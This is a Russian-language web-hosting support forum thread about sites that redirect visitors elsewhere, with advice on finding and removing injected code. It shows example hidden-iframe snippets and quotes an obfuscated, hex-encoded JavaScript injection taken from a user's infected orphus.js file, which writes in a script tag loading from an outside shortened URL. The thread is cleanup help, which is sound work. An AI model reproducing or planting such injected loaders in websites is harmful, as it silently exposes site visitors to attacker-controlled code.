Модератор форума: Yuri_G  
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
Oksane
Сообщений: 35
Репутация: 1

Сообщение # 781 | 05:16:56
webanet, да в том и дело, что очень хочется чтоб быстрее яндекс хотя бы предупреждение о небезопасности сайта убрал ( Да и что тут еще можно подробнее написать?

Добавлено (07 Фев 2017, 05:16:56)
---------------------------------------------
webanet, все таки взломали не 1 сайт. Я пришла к выводу, что взломали сайты с одним паролем. 1 подобрали и остальные сайты, к которым подошло.
Еще на одном нашла скрипт, а вот тут не могу dlyapo*lnyx.ru. Соответственно ничего не трогала, помогите.
Сообщение отредактировал Oksana5339 - Вторник, 07 Фев 2017, 05:55:21
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 782 | 13:10:11
Oksana5339,
Цитата
dlyapo*lnyx.ru
прошла главную и пару страниц каталога статей и там совершенно чисто. вы убрали? если не убрали посмотрите сайт с других браузеров

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Oksane
Сообщений: 35
Репутация: 1

Сообщение # 783 | 13:33:02
webanet, ничего не нашла, соответствено не убирала. Редирект так же, как и на других сайтах, ТОЛЬКО при заходе из ПС
Сообщение отредактировал Oksana5339 - Вторник, 07 Фев 2017, 13:43:53
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 784 | 13:47:38
Oksana5339, вот этот скрипт заражен http://dlyapolnyx.ru/orphus.js
в файловом менеджере найдите файл с названием orphus.js откройте его на редактирование (разводной ключ или карандаш напротив файла) в самом низу удалите вредоносную вставку

Цитата
var _0xb4b0=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x36\x67\x31\x4D\x55\x58\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xb4b0[25]](_0xb4b0[0]+ _0xb4b0[1]+ _0xb4b0[2]+ _0xb4b0[3]+ _0xb4b0[4]+ _0xb4b0[5]+ _0xb4b0[6]+ _0xb4b0[7]+ _0xb4b0[8]+ _0xb4b0[9]+ _0xb4b0[10]+ _0xb4b0[11]+ _0xb4b0[12]+ _0xb4b0[13]+ _0xb4b0[14]+ _0xb4b0[15]+ _0xb4b0[16]+ _0xb4b0[17]+ _0xb4b0[18]+ _0xb4b0[19]+ _0xb4b0[20]+ _0xb4b0[1]+ _0xb4b0[2]+ _0xb4b0[21]+ _0xb4b0[22]+ _0xb4b0[23]+ _0xb4b0[24]);


далее все сайты переведите на индивидуальный пароль в панели управления. панель управления - безопасность - изменить пароль аккаунта - переведите на отдельный пароль и каждому сайту задайте разные пароли. далее на каждом сайте удалите всех администраторов и модераторов и даже себя удалите из администраторов. отключите модуль пользователи для всех сайтов. в панели управления для каждого сайта создайте локальный профиль (для каждого сайта разные пароли) и будете входить на сайт через адрес вашсайт/admin
САМОЕ ГЛАВНОЕ. НА ВСЕХ САЙТАХ СМЕНИТЬ ПАРОЛЬ К ФТП
запоминать пароли к фтп не надо, поэтому поставьте самые сложные из возможных что-то типа fklgjfdjgdf9er8t93th5keigu
далее будете смотреть. если после всех мероприятий появится снова. опять обязательно пишите

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Oksane
Сообщений: 35
Репутация: 1

Сообщение # 785 | 14:01:47
webanet, удалила, но не помогло( Весь код в файле
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 786 | 14:09:11
Oksana5339, удалить и сохранить файл. после сбросить кеш. вы переходите пока по кешу

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Oksane
Сообщений: 35
Репутация: 1

Сообщение # 787 | 14:14:57
webanet, да, действительно. Спасибо вам огромное, что уделили так много времени. Думаю все таки что подобрали пароль к 1 из сайтов, еще к 2 был такой же, поэтому так все и произошло. На всех сайтах свой код внедряли по-разному, чтобы ушло время на поиск.
Почти все меры предосторожности, предложенные вами, применила
Сообщение отредактировал Oksana5339 - Вторник, 07 Фев 2017, 14:17:48
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 788 | 14:29:56
Oksana5339, нет. не все. модуль пользователи вы не поотключали и админов не убрали. читайте внимательно

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Oksane
Сообщений: 35
Репутация: 1

Сообщение # 789 | 16:33:20
webanet, я добавила ограничение по IP вместо этого. У меня девочки авторы работают, я не могу пользователей отключить

Добавлено (10 Фев 2017, 16:33:20)
---------------------------------------------
Уже 3 дня в Яндексе пометка не спадает о том что сайт вредоносный (( Тот как то быстро убрали, а эти так и остались. Может еще что то там есть?( С вебмастера отправила сообщение об исправлении, толку нет

Сообщение отредактировал Oksana5339 - Пятница, 10 Фев 2017, 01:48:49
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 790 | 17:27:40
Oksana5339, вам ответили в вебмастере или нет? по какому сайту идет предупреждение?

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
uagotmot
Сообщений: 1
Репутация: 0

Сообщение # 791 | 14:22:11
В мобильной версии сайта (с планшета или с мобильного) всплывает реклама при закрытии или просто подождать полной загрузки перекидует на левый сайт ( установка приложения али и тд ). Я так понял это реклама ваша, вот мне стало интересно это норма что после этого я не могу вернуться на сайт приходится наново водить адрес и ждать рекламы которую можно закрыть. Мой сайт http://my-phones.at.ua
tolya5827
Сообщений: 1
Репутация: 0

Сообщение # 792 | 12:00:01
сайт http://cermare.at.ua/ не открывается. в место него чужой сайт - http://lan.langate.ua/
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 793 | 12:42:12
tolya5827, ваш сайт доступен по адресу cermare.at.ua. Сайт lan.langate.ua, судя по вашему IP, является сайтом вашего провайдера. Если перенаправление остается, обратитесь к провайдеру для решения данного вопроса.
_White_Wolf_
Сообщений: 2
Репутация: 9

Сообщение # 794 | 15:27:05
Всем доброго времени суток!
Вот и до меня добралась подобная проблема, вместо моего сайта http://white-wolf.tk/ открывается http://www.freenom.link/de/index.html?lang=de
Сам бы может поискал где проблема, но на сайт попасть никак не могу, перекидывает и всё sad
Получается заходить только с телефона, но на нём в ручную проверять весь код это не реально...
За ранее благодарю за оказанную помощь!

Добавлено (08 Окт 2017, 15:27:05)
---------------------------------------------
вношу поправочку, открепил бесплатный домен, т.к. в коде сайта, в ручную, ничего не нашёл.
сайт будет доступен по адресу http://white-wolf.my1.ru, после того, как открепится старый домен (может длиться до 12-ти часов).

Сообщение отредактировал _White_Wolf_ - Воскресенье, 08 Окт 2017, 11:22:46
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 795 | 15:48:40
_White_Wolf_, проблема в вашем бесплатном домене. уберите ссылки из меню ведущие на ваш бесплатный домен. сбросьте кеш в браузере и входите на сайт по старому адресу http://white-wolf.my1.ru/ и у вас все будет работать. и больше не связывайтесь с доменами tk так как их стали отключать

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Поиск: